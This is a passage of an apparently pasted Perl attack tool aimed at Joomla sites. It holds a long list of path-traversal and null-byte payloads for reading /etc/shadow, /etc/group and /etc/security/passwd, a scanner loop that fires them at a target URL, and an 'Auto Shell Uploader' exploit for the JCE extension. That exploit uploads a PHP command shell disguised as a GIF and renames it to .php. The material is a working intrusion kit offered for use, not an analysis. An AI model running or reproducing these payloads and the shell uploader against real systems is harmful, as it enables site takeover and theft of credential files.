%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//....//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
- print "\n\ Enter Target eg:http://www.site.com/index.php?option=com_jeauto&view=";
- print "\n\ Target:";
- $Target=<STDIN>;
- chomp ($kkk);
- foreach $LFI(@LFI){
- my $URL = $kkk.$LFI;
- my $Source = get $URL;
- die "Can not get $URL" unless defined $URL;
- if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
- else { $Message = "NOT FOUND LFI Vulnerability";}
- print "$URL => $Message\n";
- print "\n \n \n \n \t \t \t \t FINISH ";
- open (TEXT, '>>LFI.txt');
- print TEXT "\n$URL => $Message \n\n";
- close (TEXT);
- print 'result in LFI.txt';
- }
- }
- if($c eq '5')
- {
- system("title Joomla JCE vuln");
- system("cls");
- print color("green"), "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
- print color("green"), "\t|||| edited by: Nadim Zobaer (nadimzobaer[@]gmail[dot]com) ||||\n\n";
- print color("green"), "Write your target (without http://) : ";
- my $fuck = <>;
- chomp $fuck;
- $TARGET = $fuck;
- $PORT = "80";
- $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
- $SHELL = "/images/stories/0day.php?cmd=";
- $HTTP = "http://";
- $header1G = "GET $SCRIPT HTTP/1.1";
- $header1H = "HEAD /images/stories/0day.php HTTP/1.1";
- $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
- $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
- $header2 = "Host: $TARGET";
- $header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
- $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
- $header5 = "Content-Length: 769";
- $header6 = "-----------------------------41184676334";
- $header7 = 'Content-Disposition: form-data; name="upload-dir"';
- $header8 = '/';
- $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
- $header10 = 'Content-Type: application/octet-stream';
- $header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
- $header12 = "0";
- $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
- $header14 = 'Content-Type: image/gif';
- $header15 = 'GIF89aG';
- $header16 = "<? system($_GET['cmd']);exit; ?>";
- $header17 = 'Content-Disposition: form-data; name="upload-name"';
- $header18 = '0day';
- $header19 = 'Content-Disposition: form-data; name="action"';
- $header20 = 'upload';
- $header21 = "-----------------------------41184676334--";
- $header22 = 'X-Request: JSON';
- $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
- $header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
- $header24 = "Content-Length: ".length($header25)."";
- ############################################### Packet 1 --> Checking Exploitability #########################################################
- print "\n[*] Checking Exploitability ...\n\n";
- sleep 2;
- $pageURL=$TARGET.$SCRIPT;
- $simplePage=get($pageURL);
- @arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
- while (($count!=10) && ($die != 1)) {
- foreach $arr(@arr){
- if ($simplePage =~ m/$arr/) {
- print "\n[*] Target patched.\n\n";
- $die = 1;
- } else {
- $count++;
- }
- }
- }
- if ($count==5) {print "[*] Target is exploitable.\n\n"};
- ############################################### Packet 2 --> Uploading shell as a gif file #########################################################
- $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
- || die "Can't connect to $TARGET";
- print "[*] Trying to upload 0day.gif ...\n\n";
- print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
- sleep 2;
- ############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
- print "[*] Trying to change extension from .gif to .php ...\n\n";
- $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
- || die "Can't connect to $TARGET";
- print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
- ############################################### Packet 4 --> Check for successfully uploaded #########################################################
- $shellurl=$TARGET.$SHELL;
- $output=get($shellurl);
- while ($output = <$remote> ) {
- if ($output =~ /200 OK/) {
- print "[+] 0day.php was successfully uploaded\n\n";
- print "[+] Path:".$TARGET.$SHELL."id\n";
- }}
- }
- }
Add Comment
Please, Sign In to add comment